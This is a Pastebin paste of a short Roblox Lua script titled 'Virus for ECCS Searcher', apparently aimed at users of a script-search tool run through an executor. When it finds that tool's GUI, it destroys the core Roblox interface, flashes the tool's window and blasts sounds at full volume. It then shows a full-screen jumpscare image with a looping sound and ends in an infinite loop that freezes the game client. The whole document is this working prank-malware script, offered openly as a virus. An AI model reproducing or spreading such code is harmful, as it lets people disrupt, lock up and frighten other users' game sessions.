Advertisement
ERROR_CODE

Virus for ECCS Searcher

Sep 3rd, 2024 (edited)
83
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 1.24 KB | None | 0 0
  1. if game:GetService("CoreGui"):FindFirstChild("UIGui") then
  2. game.CoreGui.RobloxGui:Destroy()
  3. game.CoreGui.TopBarApp:Destroy()
  4. ScreenGui = Instance.new("ScreenGui")
  5. CoreFrame = Instance.new("ImageLabel")
  6. Scary = Instance.new("Sound")
  7. ScreenGui.Name = "ScreenGui"
  8. ScreenGui.Parent = game.CoreGui
  9. game.CoreGui.ScreenGui.Enabled = true
  10. for i = 1,100 do
  11. wait()
  12. UIClick = Instance.new("Sound")
  13. UINoScriptsFound = Instance.new("Sound")
  14. UIClick.Parent = game.Workspace
  15. UIClick.SoundId = "rbxassetid://3623733749"
  16. UIClick.Playing = true
  17. UIClick.Looped = false
  18. UIClick.Volume = 100
  19. UINoScriptsFound.Parent = game.Workspace
  20. UINoScriptsFound.SoundId = "rbxassetid://6243040798"
  21. UINoScriptsFound.Playing = true
  22. UINoScriptsFound.Looped = false
  23. UINoScriptsFound.Volume = 100
  24. game.CoreGui.UIGui.MainFrame.Visible = false
  25. wait()
  26. game.CoreGui.UIGui.MainFrame.Visible = true
  27. end
  28. CoreFrame.Parent = ScreenGui
  29. CoreFrame.Size = UDim2.new(1,0,1,100)
  30. CoreFrame.Position = UDim2.new(0,0,0,-100)
  31. CoreFrame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  32. CoreFrame.Image = "rbxassetid://15813862659"
  33. Scary.Parent = game.Workspace
  34. Scary.SoundId = "rbxassetid://7076365030"
  35. Scary.Playing = true
  36. Scary.Looped = true
  37. Scary.Volume = 100
  38. wait(2)
  39. while true do end
  40. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement